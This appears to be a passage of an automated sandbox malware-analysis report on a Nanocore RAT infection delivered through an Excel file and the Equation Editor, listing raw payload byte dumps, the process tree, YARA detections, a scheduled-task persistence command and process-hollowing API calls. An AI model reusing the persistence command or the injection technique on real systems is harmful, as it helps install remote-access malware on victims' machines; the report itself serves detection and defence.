                  Jan 26, 2021 09:22:04.691586971 CET6INData Raw: 00 00 0a 00 09 6f 78 00 00 0a 26 02 28 79 00 00 0a 00 00 2b 29 06 17 fe 02 13 04 11 04 2c 10 72 17 03 00 70 16 14 28 76 00 00 0a 26 00 2b 0f 00 72 5d 03 00 70 16 14 28 76 00 00 0a 26 00 de 1f 25 28 7a 00 00 0a 13 05 00 11 05 6f 7b 00 00 0a 16 14
                  Data Ascii: ox&(y+),rp(v&+r]p(v&%(zo{(v&(|*A6&(y*B(6(S*0,,{,{o7(8*&{+*"}*&{+*"
                  Jan 26, 2021 09:22:04.830677986 CET7INData Raw: 00 0a 6f 49 00 00 0a 00 02 6f 2f 00 00 06 72 c5 03 00 70 6f 4a 00 00 0a 00 02 6f 2f 00 00 06 20 68 03 00 00 20 c4 00 00 00 73 4b 00 00 0a 6f 4c 00 00 0a 00 02 6f 2f 00 00 06 1c 6f 4d 00 00 0a 00 02 6f 2f 00 00 06 16 6f 80 00 00 0a 00 02 6f 2f 00
                  Data Ascii: oIo/rpoJo/ h sKoLo/oMo/oo/rpooQ psHoIoQrpoJoQ sKoLoQoMoQrpoOoO HsHoIoOrApoJoO
                  Jan 26, 2021 09:22:04.830707073 CET9INData Raw: 18 1f 48 73 48 00 00 0a 6f 49 00 00 0a 00 02 6f 3f 00 00 06 72 53 01 00 70 6f 4a 00 00 0a 00 02 6f 3f 00 00 06 20 97 00 00 00 1f 14 73 4b 00 00 0a 6f 4c 00 00 0a 00 02 6f 3f 00 00 06 18 6f 4d 00 00 0a 00 02 6f 3f 00 00 06 72 a3 04 00 70 6f 52 00
                  Data Ascii: HsHoIo?rSpoJo? sKoLo?oMo?rpoRo? oSoA sHoIoArpoJoA sKoLoAoMoArpoOoC(oPoCrp"@AsDoEo
                  Jan 26, 2021 09:22:04.831142902 CET10INData Raw: 71 00 00 0a a2 25 1a 72 99 05 00 70 a2 25 1b 02 6f 51 00 00 06 6f 71 00 00 0a a2 25 1c 72 c3 05 00 70 a2 25 1d 02 6f 39 00 00 06 6f 71 00 00 0a a2 25 1e 72 93 05 00 70 a2 25 1f 09 02 6f 35 00 00 06 6f 71 00 00 0a a2 25 1f 0a 72 cd 05 00 70 a2 25
                  Data Ascii: q%rp%oQoq%rp%o9oq%rp%o5oq%rp%o3oq%rp(roso&rprp(&%(zo{(&(|o*A460*
                  Jan 26, 2021 09:22:04.831163883 CET11INData Raw: 00 0a 6f 6c 00 00 06 00 02 73 3f 00 00 0a 6f 6e 00 00 06 00 02 73 7e 00 00 0a 6f 70 00 00 06 00 02 73 3d 00 00 0a 6f 72 00 00 06 00 02 73 3d 00 00 0a 6f 74 00 00 06 00 02 73 3d 00 00 0a 6f 76 00 00 06 00 02 6f 59 00 00 06 6f 41 00 00 0a 00 02 6f
                  Data Ascii: ols?ons~ops=ors=ots=ovoYoAoooA(AoYo]owo^oYo]o[o^oYo]o]o^oYo]o_o^oYo]oao^oYo]oco^oY
                  Jan 26, 2021 09:22:04.831182957 CET13INData Raw: 02 6f 65 00 00 06 20 c8 00 00 00 1f 14 73 4b 00 00 0a 6f 4c 00 00 0a 00 02 6f 65 00 00 06 19 6f 4d 00 00 0a 00 02 6f 65 00 00 06 72 1f 01 00 70 6f 4f 00 00 0a 00 02 6f 67 00 00 06 28 82 00 00 0a 6f 50 00 00 0a 00 02 6f 67 00 00 06 72 d3 00 00 70
                  Data Ascii: oe sKoLoeoMoerpoOog(oPogrp"@AsDoEog(oGogHsHoIogrSpoJog sKoLogoMogrpoRog oSoi sHo
                  Jan 26, 2021 09:22:04.831197977 CET14INData Raw: 00 00 0a 00 02 6f 6f 00 00 06 16 6f 60 00 00 0a 00 02 16 28 60 00 00 0a 00 2a 00 1b 30 04 00 f7 00 00 00 0f 00 00 11 00 00 73 6c 00 00 0a 0a 06 72 11 02 00 70 6f 6d 00 00 0a 00 06 6f 6e 00 00 0a 00 73 6f 00 00 0a 0b 07 06 6f 70 00 00 0a 00 1f 0b
                  Data Ascii: ooo`(`*0slrpomonsoopK%rXp%oioq%rp%oeoq%rp%owoq%rp%o_oq%rp%o[oq%rp(roso&rprp(
                  Jan 26, 2021 09:22:04.831213951 CET15INData Raw: 00 00 04 2b 00 2a 22 02 03 7d 5b 00 00 04 2a 26 02 7b 5c 00 00 04 2b 00 2a 22 02 03 7d 5c 00 00 04 2a 26 02 7b 5d 00 00 04 2b 00 2a 00 13 30 02 00 37 00 00 00 12 00 00 11 02 fe 06 b9 00 00 06 73 90 00 00 0a 0a 02 7b 5d 00 00 04 0b 07 2c 07 07 06
                  Data Ascii: +*"}[*&{\+*"}\*&{]+*07s{],o}]{],o*&{^+*07s9{^,o:}^{^,o;*0s}os>os?o


                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:09:21:52
                  Start date:26/01/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13f8b0000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:22:12
                  Start date:26/01/2021
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:22:15
                  Start date:26/01/2021
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\vbc.exe'
                  Imagebase:0x10700000
                  File size:781824 bytes
                  MD5 hash:81956BB4F67D790E13CFD18F4CDD779B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2169962505.00000000023C1000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2170026824.0000000002400000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 26%, ReversingLabs
                  Reputation:low

                  General

                  Start time:09:22:17
                  Start date:26/01/2021
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp'
                  Imagebase:0xad0000
                  File size:179712 bytes
                  MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:22:18
                  Start date:26/01/2021
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Users\Public\vbc.exe
                  Imagebase:0x10700000
                  File size:781824 bytes
                  MD5 hash:81956BB4F67D790E13CFD18F4CDD779B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:09:22:18
                  Start date:26/01/2021
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\Public\vbc.exe
                  Imagebase:0x10700000
                  File size:781824 bytes
                  MD5 hash:81956BB4F67D790E13CFD18F4CDD779B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.2379792375.0000000000520000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.2379792375.0000000000520000.00000004.00000001.sdmp, Author: Florian Roth
                  Reputation:low

                  General

                  Start time:09:22:32
                  Start date:26/01/2021
                  Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
                  Imagebase:0x10050000
                  File size:781824 bytes
                  MD5 hash:81956BB4F67D790E13CFD18F4CDD779B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.2205048820.0000000002164000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 35%, Virustotal, Browse
                  • Detection: 26%, ReversingLabs
                  Reputation:low

                  General

                  Start time:09:22:34
                  Start date:26/01/2021
                  Path:C:\Windows\SysWOW64\schtasks.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmp1334.tmp'
                  Imagebase:0x2d0000
                  File size:179712 bytes
                  MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:09:22:35
                  Start date:26/01/2021
                  Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                  Imagebase:0x10050000
                  File size:781824 bytes
                  MD5 hash:81956BB4F67D790E13CFD18F4CDD779B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >

                    Executed Functions

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: `!*m$`!*m$`!*m
                    • API String ID: 0-3236312437
                    • Opcode ID: 7386848ecc8a7e971ceba50c1cee8fdbdabf297b5c256d040a4cc3b94ec9da15
                    • Instruction ID: 9100e804a6211a33ecb820345446eb66e8c2d6d39cb471cf6e298a6c147a4129
                    • Opcode Fuzzy Hash: 7386848ecc8a7e971ceba50c1cee8fdbdabf297b5c256d040a4cc3b94ec9da15
                    • Instruction Fuzzy Hash: 7961CF74E002089FDB08DFE9D8949DDBBB2FF89304F54812AE909AB365DB309991CF51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: @2*m$H*Q
                    • API String ID: 0-2517136648
                    • Opcode ID: 109049e2c18bc94159e6a56aafb2982d223ca20a8914fa8fd7ed5a4f1eb18a3c
                    • Instruction ID: a0d745cf5cad54e3b32226512c411e9ac46a0565ba605c6af7019c77631e227d
                    • Opcode Fuzzy Hash: 109049e2c18bc94159e6a56aafb2982d223ca20a8914fa8fd7ed5a4f1eb18a3c
                    • Instruction Fuzzy Hash: 27514D709102098FD748EFB9D9906DEBBF6AFC8304F048939D0199B765DB706986CF92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: ,
                    • API String ID: 0-3772416878
                    • Opcode ID: ddc55dcbc7d60408789774eda4ad1256f901b7887ca4c3674ce88041b039b85f
                    • Instruction ID: 24bdccc8d76c697266026a78628073135e721ce4cbfbe638f830e52c599224a7
                    • Opcode Fuzzy Hash: ddc55dcbc7d60408789774eda4ad1256f901b7887ca4c3674ce88041b039b85f
                    • Instruction Fuzzy Hash: 90810FB4E10209CFDB14DFA9C8446EDBBF2AF89305F64846AD408A7315EB749E81CF51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 10bbd97f3ca4fb36bde1f128f6e114f6e3b34fdeb61a1c00415cd635cc35985b
                    • Instruction ID: a63745565e24e21ebe3e49c31d97329df2558fffbdbb8c110432e2b3ecc702f6
                    • Opcode Fuzzy Hash: 10bbd97f3ca4fb36bde1f128f6e114f6e3b34fdeb61a1c00415cd635cc35985b
                    • Instruction Fuzzy Hash: 99B10EB4E10209CFCB10DFA9C5846EEBBF6AF89315F64856AD408A7345DB309982CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7fd9eef14c02149b56b550554059d60f919b2770106e8126b114c9bae239ad3e
                    • Instruction ID: b331b86ec8814fccfbe625126625b52f5794c5cd359eced62f06d6d77e49a5b4
                    • Opcode Fuzzy Hash: 7fd9eef14c02149b56b550554059d60f919b2770106e8126b114c9bae239ad3e
                    • Instruction Fuzzy Hash: 86812674E20209CFCB00DFA9C941AEEBBF6AF98355F64C465D408AB309EB309D568B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f8894af90d57ad3e52eddb2a6514df7a7d5053f2f9a793b0048183e16d5b61b1
                    • Instruction ID: 4f6399b4a8a53dd7c25847ff1e1dd005ce2189295e25cc8ed964f44cc4247a55
                    • Opcode Fuzzy Hash: f8894af90d57ad3e52eddb2a6514df7a7d5053f2f9a793b0048183e16d5b61b1
                    • Instruction Fuzzy Hash: 0C8125B4E20209DFCB04DFE9C5416EEBBF6AF98355F64C525D408AB309DB309946CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d2f8c4dd233ca8c09725472612f686fcce3b55f8d507302a4a9e05258b9d209b
                    • Instruction ID: 8b33020bfc61909634cb80a18de036e252262f022cc3448ce0fbe7a1ce291784
                    • Opcode Fuzzy Hash: d2f8c4dd233ca8c09725472612f686fcce3b55f8d507302a4a9e05258b9d209b
                    • Instruction Fuzzy Hash: FE812871E10219CBDF14CFA9C8516EEBBB6BF88354F94C469D808BB304EB3099658F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002BB307
                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 130529949212a679e534ef325f03ba8ce290b6c8e444f59cc5a3ec9fe6aea749
                    • Instruction ID: 1ac5c195d1f34ad35a6c3792ea9516445ca4a5b5c25932d772814b0e8b98b36d
                    • Opcode Fuzzy Hash: 130529949212a679e534ef325f03ba8ce290b6c8e444f59cc5a3ec9fe6aea749
                    • Instruction Fuzzy Hash: 0BC13470D1021D8FDB21CFA8C851BEEBBB5BF49344F1096A9D849B7240DBB09A95CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 002BAD8B
                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 147e854b6f710f11451147730fbcc137fd34afc0b0a45b25c673b243dc99a169
                    • Instruction ID: 15370213d606179411085e5ff77de7447de8617d1cb761569216c6ded99c1c6a
                    • Opcode Fuzzy Hash: 147e854b6f710f11451147730fbcc137fd34afc0b0a45b25c673b243dc99a169
                    • Instruction Fuzzy Hash: F641B9B4D012589FCF00CFA9D884AEEFBF5BB49304F24942AE814B7210D774AA45CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 002BAEC2
                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: af9071976c606a5f200e6253fd5d4e8af796dbaec707a2e104d69f38678b25d9
                    • Instruction ID: 8b5b6fa5320e438bad79196c0fe1fdeba8e9011df7acea1d8cfe9f467ffc25be
                    • Opcode Fuzzy Hash: af9071976c606a5f200e6253fd5d4e8af796dbaec707a2e104d69f38678b25d9
                    • Instruction Fuzzy Hash: 7F41A8B8D002589FCF10CFA9D884AEEFBB5BB09314F14A42AE814B7200D775AA55CF65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 002BAC42
                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: f27d4f7f27f3dbdc32c13baec3d51e9c8bfd4114dcd185e29180ab1c2e203c10
                    • Instruction ID: 6111ffbbb4c180240b760caa11f40f95a7adfb9cd9b795b4ca41a005cfb45bd1
                    • Opcode Fuzzy Hash: f27d4f7f27f3dbdc32c13baec3d51e9c8bfd4114dcd185e29180ab1c2e203c10
                    • Instruction Fuzzy Hash: D131A8B8D002589FCF10CFA9D884ADEFBB5BB49314F14A82AE914B7210D775A941CF65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 002BAB1F
                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 93a6f062521498b155914245ba9afb50794dfa252315665b3fadc442bb5211ab
                    • Instruction ID: a3df61356f6ff1cabbcfc10fe2bb60e3be9d118274b10d2590817bce66516971
                    • Opcode Fuzzy Hash: 93a6f062521498b155914245ba9afb50794dfa252315665b3fadc442bb5211ab
                    • Instruction Fuzzy Hash: 5C31BAB4D112589FCB10CFA9D884AEEFBF5BB49314F24942AE414B7200D778AA45CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 7c68fc7f618b3d6f18c3e658e84e228caa33016e336960ad0ff7176599c2e258
                    • Instruction ID: e169f7829b3556330e07da22c10b95ce716776c0d4fd19f01873f6b9bb903e3f
                    • Opcode Fuzzy Hash: 7c68fc7f618b3d6f18c3e658e84e228caa33016e336960ad0ff7176599c2e258
                    • Instruction Fuzzy Hash: 1731ACB4D112189FCF14CFA9E884ADEFBB4AF49314F14942AE815B7300D774A941CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2169368908.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ae38562e634fdc1fdcf68b4c38006dc7f64e19714376123eaa1c8a0b2f73f515
                    • Instruction ID: 0664e66a105e6411f8435ff5a7da063dfd10414c6b07584c30bfdb8f539b254a
                    • Opcode Fuzzy Hash: ae38562e634fdc1fdcf68b4c38006dc7f64e19714376123eaa1c8a0b2f73f515
                    • Instruction Fuzzy Hash: F621D075604248DFDB24DF64E984B16BB75EF88314F24C9A9E80E4B346C33AD857CA61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2169368908.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e18ad826902b2a9a4892f5ad72e11ba96c9c0f9c8ebc2025c3c8dbe8aaff189e
                    • Instruction ID: 17e2d2ade7dc6039616b45c725b541bdbb2cc4a38291f755a09990c737b603a0
                    • Opcode Fuzzy Hash: e18ad826902b2a9a4892f5ad72e11ba96c9c0f9c8ebc2025c3c8dbe8aaff189e
                    • Instruction Fuzzy Hash: 2C218E755093848FCB12CF20D994715BF71EF46314F28C5EAD8498B6A7C33A984ACB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2169349027.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6ee8cb62bfdc8abba0082e9448a30d56010e1bf94a9aeba614b0d8c863f9a27
                    • Instruction ID: ec26921de8b174f8d17ad302cfc9df36f44fb78a1c605bc1764c6f210f7baf37
                    • Opcode Fuzzy Hash: e6ee8cb62bfdc8abba0082e9448a30d56010e1bf94a9aeba614b0d8c863f9a27
                    • Instruction Fuzzy Hash: 4401DB71A043449AE7209A69EC847A7FFDCEF52724F18C55AEE145B282C378DC40C7B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000004.00000002.2169349027.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bd7111a64efdc1b6af4e8f36b84ad1956c4457f3830fe23bdd22cf3b6f40eed4
                    • Instruction ID: 09a91f9376ebb47e80929664aabfa83fb7b4f7010657eb725943a55ab49a4728
                    • Opcode Fuzzy Hash: bd7111a64efdc1b6af4e8f36b84ad1956c4457f3830fe23bdd22cf3b6f40eed4
                    • Instruction Fuzzy Hash: 57F0C2715043409AE7208A15DC88B62FF98EF91324F18C45EED185B286C3789C44CBB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2169403381.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: =
                    • API String ID: 0-2322244508
                    • Opcode ID: c560de8cccbfe5a93f9f3f9c74e4b25fb2ef909b93f1b9196f3ef21553a537c0
                    • Instruction ID: 575699ae5ac41e23c4a982a923edfd6e63e66c67a4ff0e66af3eadd82b80f965
                    • Opcode Fuzzy Hash: c560de8cccbfe5a93f9f3f9c74e4b25fb2ef909b93f1b9196f3ef21553a537c0
                    • Instruction Fuzzy Hash: 53517DB1E116588BEB18CF6B8D407CEFAF7AFC9300F14C5BA851DAA255DB7009868F11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    APIs
                    • RegQueryValueExA.KERNEL32(00000000,001E5879,00020119,00000000,00000000,?), ref: 001E5C4F
                    Memory Dump Source
                    • Source File: 00000008.00000002.2379637169.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                    Similarity
                    • API ID: QueryValue
                    • String ID:
                    • API String ID: 3660427363-0
                    • Opcode ID: 775b773eae184c0791daba75e777b97da48dca102fb5393ff6f6e3cc36fb0fac
                    • Instruction ID: 928aea4efa7a99da419b3b32f3770e859c4cba0c0048f7a01a42d27d627fb59c
                    • Opcode Fuzzy Hash: 775b773eae184c0791daba75e777b97da48dca102fb5393ff6f6e3cc36fb0fac
